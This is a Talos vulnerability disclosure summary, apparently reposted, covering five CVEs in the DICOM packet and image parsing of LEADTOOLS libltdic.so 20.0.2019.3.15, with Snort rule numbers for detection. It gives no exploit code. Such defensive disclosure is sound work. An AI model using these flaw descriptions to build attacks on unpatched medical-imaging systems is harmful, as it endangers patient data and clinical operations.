LEADTOOLS CMP-parsing code execution vulnerability (TALOS-2019-0877/CVE-2019-5085)

An exploitable code execution vulnerability exists in the DICOM packet-parsing functionality of LEADTOOLS libltdic.so, version 20.0.2019.3.15. A specially crafted packet can cause an integer overflow, resulting in heap corruption. An attacker can send a packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

LEADTOOLS libltdic.so DICOM LDicomNet::receive information disclosure vulnerability (TALOS-2019-0882/CVE-2019-5090)

An exploitable information disclosure vulnerability exists in the DICOM packet-parsing functionality of LEADTOOLS libltdic.so, version 20.0.2019.3.15. A specially crafted packet can cause an out-of-bounds read, resulting in information disclosure. An attacker can send a packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

LEADTOOLS libltdic.so LDicomAssociate::SetBinary denial-of-service vulnerability (TALOS-2019-0883/CVE-2019-5091)

An exploitable denial-of-service vulnerability exists in the Dicom-packet parsing functionality of LEADTOOLS libltdic.so version 20. A specially crafted packet can cause an infinite loop, resulting in a denial of service. An attacker can send a packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

LEADTOOLS libltdic.so LDicomAssociate::SetBinary denial-of-service vulnerability (TALOS-2019-0884/CVE-2019-5092)

An exploitable heap out-of-bounds write vulnerability exists in the UI tag-parsing functionality of the DICOM image format of LEADTOOLS 20. A specially crafted DICOM image can cause an offset beyond the bounds of a heap allocation to be written, potentially resulting in code execution. An attacker can specially craft a DICOM image to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

LEADTOOLS libltdic.so DICOM LDicomNet::SendData code execution vulnerability (TALOS-2019-0885/CVE-2019-5093)

An exploitable code execution vulnerability exists in the DICOM network response functionality of LEADTOOLS libltdic.so version 20.0.2019.3.15. A specially crafted packet can cause an integer overflow, resulting in heap corruption. An attacker can send a packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 20.0.2019.3.15 of LEADTOOLS is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50857, 50897 - 50899, 50908, 50909, 52082, 52083,
Viewing all 1927 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>